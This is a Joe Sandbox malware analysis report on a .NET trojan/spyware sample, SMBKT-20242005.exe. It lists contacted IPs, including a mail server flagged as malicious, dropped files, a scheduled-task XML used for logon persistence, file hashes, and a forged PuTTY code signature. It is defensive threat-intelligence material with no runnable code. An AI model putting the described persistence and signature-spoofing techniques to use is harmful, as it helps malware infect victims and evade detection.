                        https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgGSMBKT-20242005.exe, joUXSCpr.exe.1.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, joUXSCpr.exe, 00000009.00000002.1492085386.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.chiark.greenend.org.uk/~sgtatham/putty/0SMBKT-20242005.exe, joUXSCpr.exe.1.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://r3.i.lencr.org/0RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        104.26.13.205
                        		api.ipify.orgUnited States
                        		13335CLOUDFLARENETUSfalse
                        212.44.102.65
                        		mail.stilbo.euSlovenia
                        		43128DHH-ASSItrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1444949
                        Start date and time:2024-05-21 13:44:24 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 25s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:SMBKT-20242005.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@22/11@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 313
                        • Number of non-executed functions: 29
                        Cookbook Comments:
                        • Found application associated with file extension: .exe

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: SMBKT-20242005.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        07:45:28API Interceptor1x Sleep call for process: SMBKT-20242005.exe modified
                        07:45:29API Interceptor13x Sleep call for process: powershell.exe modified
                        07:45:31API Interceptor1x Sleep call for process: joUXSCpr.exe modified
                        07:45:31API Interceptor40x Sleep call for process: RegSvcs.exe modified
                        12:45:30Task SchedulerRun new task: joUXSCpr path: C:\Users\user\AppData\Roaming\joUXSCpr.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        104.26.13.205ReturnLegend.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                        • api.ipify.org/
                        Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                        • api.ipify.org/?format=json
                        Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/?format=json
                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                        • api.ipify.org/
                        SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                        • api.ipify.org/

                        Domains

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        api.ipify.orgIMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                        • 104.26.12.205
                        SecuriteInfo.com.Win32.PWSX-gen.15208.17708.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        59c4c7e95c9549234661cc0c3a33de39958df413f3a408f3385e69fd669228fb_payload.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        Invoice KIK-1 P234478.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        Aluminium_Oxide00980000.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        RFQ11045.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        hesaphareketi-01.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        hesaphareketi-01-5202024.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.12.205
                        garanti odeme200524.scr.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                        • 172.67.74.152
                        4289397_SEA SHIPMENT.exeGet hashmaliciousAgentTeslaBrowse
                        • 172.67.74.152

                        ASNs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        CLOUDFLARENETUSSecuriteInfo.com.Win32.PWSX-gen.6793.10953.exeGet hashmaliciousFormBookBrowse
                        • 104.21.81.34
                        https://dukeenergyltd.top/bles.scrGet hashmaliciousHTMLPhisherBrowse
                        • 188.114.97.3
                        https://dukeenergyltd.top/bles.scrGet hashmaliciousHTMLPhisherBrowse
                        • 188.114.96.3
                        https://paperpile.com/app/p/972481aa-2f27-046e-8d74-eeebacfe6b15Get hashmaliciousHTMLPhisherBrowse
                        • 1.1.1.1
                        https://cleanuri.com/YyQLEnGet hashmaliciousUnknownBrowse
                        • 188.114.97.3
                        http://johnleewis.comGet hashmaliciousUnknownBrowse
                        • 188.114.96.3
                        http://aizhantagaeva.github.io/netflixGet hashmaliciousUnknownBrowse
                        • 172.64.155.119
                        https://ipfs.io/ipfs/bafkreiaifz4xo7tqmc7x3hbuqb4wsvlnyylklzgwnldgkszguv3ly2jdoy#YOUREMAILGet hashmaliciousUnknownBrowse
                        • 104.17.25.14
                        http://cf-ipfs.com/ipfs/Qmb8ZxH6YcdjvixfVo3yE3hHm5CNzVAQFSfFDavjywVtYk/gttrindeed.htmlGet hashmaliciousUnknownBrowse
                        • 104.17.64.14
                        http://cf-ipfs.com/ipfs/QmPkxJED3Fb2sHpjZ1QyjFuAuuktBdWCsvty9NVB5gE4bD/mail_delivery_pil1904.htmlGet hashmaliciousUnknownBrowse
                        • 104.17.25.14
                        DHH-ASSIa5hbkmGD7N.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.75
                        G7DyaA9iz9.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.75
                        x607DB0i08.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.75
                        x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                        • 212.44.102.75
                        EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.75
                        OWd39WUX3D.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.75
                        demand_rpkb_060923.exeGet hashmaliciousGuLoaderBrowse
                        • 212.44.101.105
                        CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.57
                        PIyT9A3jfC.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.57
                        nhVJ8J5qOt.exeGet hashmaliciousPushdoBrowse
                        • 212.44.102.57

                        JA3 Fingerprints

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0eIMG1024785000.exeGet hashmaliciousNanocore, AgentTesla, PureLog StealerBrowse
                        • 104.26.13.205
                        http://shaifansar1.github.io/Netflix-Landing-PageGet hashmaliciousUnknownBrowse
                        • 104.26.13.205
                        http://rishavcoder.github.io/clone-discordGet hashmaliciousUnknownBrowse
                        • 104.26.13.205
                        http://attyahoonewworker-white-art-e0ce.danelle268.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                        • 104.26.13.205
                        https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
                        • 104.26.13.205
                        SecuriteInfo.com.Win32.PWSX-gen.15208.17708.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exeGet hashmaliciousGuLoader, XWormBrowse
                        • 104.26.13.205
                        59c4c7e95c9549234661cc0c3a33de39958df413f3a408f3385e69fd669228fb_payload.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        Invoice KIK-1 P234478.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205
                        Aluminium_Oxide00980000.pdf.exeGet hashmaliciousAgentTeslaBrowse
                        • 104.26.13.205

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SMBKT-20242005.exe.log

                        Download File
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\joUXSCpr.exe.log

                        Download File
                        Process:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):1216
                        Entropy (8bit):5.34331486778365
                        Encrypted:false
                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2232
                        Entropy (8bit):5.379401388151058
                        Encrypted:false
                        SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:fLHxvIIwLgZ2KRHWLOugQs
                        MD5:254E3634833B07F95061588B960F3D96
                        SHA1:10F786DD15EBD4FD93687219D109B0E2F8499010
                        SHA-256:A3C6A2952F11C3EEDF8D48AEC01FD3B12723526899714272D02FB20A6A3C76E0
                        SHA-512:78B9B4BE082863EAB414C444CB5A2CCCA0C81A0176D743D578EADE9A7321AD65A3083FE3416C3428BC7B757E76427D543AB18617B19811CCC17C78ACDC126B1E
                        Malicious:false
                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fv52zpf.um0.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5qd5z15m.5aw.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iflrwkg2.lpi.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlqfrvgb.rm2.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\tmp1263.tmp

                        Download File
                        Process:C:\Users\user\AppData\Roaming\joUXSCpr.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):5.086590633524768
                        Encrypted:false
                        SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew7v:HeLwYrFdOFzOz6dKrsuqI
                        MD5:3218A76B9A06204A3AF2D447B8C2AA3D
                        SHA1:256B34D68DD884BEED8C089D72F3A1F9984DF78E
                        SHA-256:5D536F1A22FDD7C4E9F5AEDCBA1BB02AE0B02ED617758670B312A37FA03C3C1B
                        SHA-512:619E60F3DA5BB90EFDAC21609FF0CB49B19418CC11791B990F48D3393B4C18C17325AF5DE411116A761BE323F160BBE85D2D5B3D848478CEE4CDCE8A524E1364
                        Malicious:false
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                        C:\Users\user\AppData\Local\Temp\tmp6AB.tmp

                        Download File
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:XML 1.0 document, ASCII text
                        Category:dropped
                        Size (bytes):1567
                        Entropy (8bit):5.086590633524768
                        Encrypted:false
                        SSDEEP:48:cge2oHr8YrFdOFzOzN33ODOiDdKrsuTew7v:HeLwYrFdOFzOz6dKrsuqI
                        MD5:3218A76B9A06204A3AF2D447B8C2AA3D
                        SHA1:256B34D68DD884BEED8C089D72F3A1F9984DF78E
                        SHA-256:5D536F1A22FDD7C4E9F5AEDCBA1BB02AE0B02ED617758670B312A37FA03C3C1B
                        SHA-512:619E60F3DA5BB90EFDAC21609FF0CB49B19418CC11791B990F48D3393B4C18C17325AF5DE411116A761BE323F160BBE85D2D5B3D848478CEE4CDCE8A524E1364
                        Malicious:true
                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f

                        C:\Users\user\AppData\Roaming\joUXSCpr.exe

                        Download File
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):751112
                        Entropy (8bit):7.951191991023997
                        Encrypted:false
                        SSDEEP:12288:q3nKIhswVenAJnEorRImS5INcHSXh6+QrDpLh/xWBdEhApcVXf2kR:4nKLmeYBWGcHMgFhZWBnsV
                        MD5:52CD4C12A51D55526CEAA5F1E7F9E549
                        SHA1:6CA86A42D595177B554B82B5EA3A8DD40D1C3280
                        SHA-256:C501EBCF488C9172EF490E70C37ADB5926783F3AAC132E8FF58F90B6B3232E03
                        SHA-512:285B4BE0A187E86316B0335E5B587DFFB23B77952AFEF1F48A879B567E602A6ABBADA2C7CD65A02F4AFB2F532E2912B446849255B9D2E70448AB6E0CC5CEFFE4
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 37%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Kf.................6...........U... ........@.. ....................................@..................................T..W....`...............@...6........................................................... ............... ..H............text...$5... ...6.................. ..`.rsrc........`.......8..............@..@.reloc...............>..............@..B.................U......H.......d...`O......(....................................................0..A....... .........%.E...(.....F... *........%.-...(.........(W...*.....&*...^..}.....(.......(.....*.0..........~F....~........E........d...d...................+.....(......{....o....r...po....&..!. {...Y.+..{....o....r...po....&.{....o....r...po....&. ......8v....{....o....r)..po....&.{....o....r=..po....&. ..... ....Y.87....{.....o......{.....o.......8.....{.....o.....*...0..........~.......sl....+.

                        C:\Users\user\AppData\Roaming\joUXSCpr.exe:Zone.Identifier

                        Download File
                        Process:C:\Users\user\Desktop\SMBKT-20242005.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Entropy (8bit):7.951191991023997
                        TrID:
                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                        • Win32 Executable (generic) a (10002005/4) 49.96%
                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                        • Generic Win/DOS Executable (2004/3) 0.01%
                        • DOS Executable Generic (2002/1) 0.01%
                        File name:SMBKT-20242005.exe
                        File size:751'112 bytes
                        MD5:52cd4c12a51d55526ceaa5f1e7f9e549
                        SHA1:6ca86a42d595177b554b82b5ea3a8dd40d1c3280
                        SHA256:c501ebcf488c9172ef490e70c37adb5926783f3aac132e8ff58f90b6b3232e03
                        SHA512:285b4be0a187e86316b0335e5b587dffb23b77952afef1f48a879b567e602a6abbada2c7cd65a02f4afb2f532e2912b446849255b9d2e70448ab6e0cc5ceffe4
                        SSDEEP:12288:q3nKIhswVenAJnEorRImS5INcHSXh6+QrDpLh/xWBdEhApcVXf2kR:4nKLmeYBWGcHMgFhZWBnsV
                        TLSH:60F4230687BD6F1BD7F9677288E1D0098FF264896221D69E7EC110D31ED6B44AB01F8B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....7Kf.................6...........U... ........@.. ....................................@................................

                        File Icon

                        Icon Hash:00928e8e8686b000

                        Static PE Info

                        General

                        Entrypoint:0x4b551e
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x664B37EA [Mon May 20 11:45:46 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                        Authenticode Signature

                        Signature Valid:false
                        Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                        Signature Validation Error:The digital signature of the object did not verify
                        Error Number:-2146869232
                        Not Before, Not After
                        • 13/11/2018 00:00:00 08/11/2021 23:59:59
                        Subject Chain
                        • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                        Version:3
                        Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
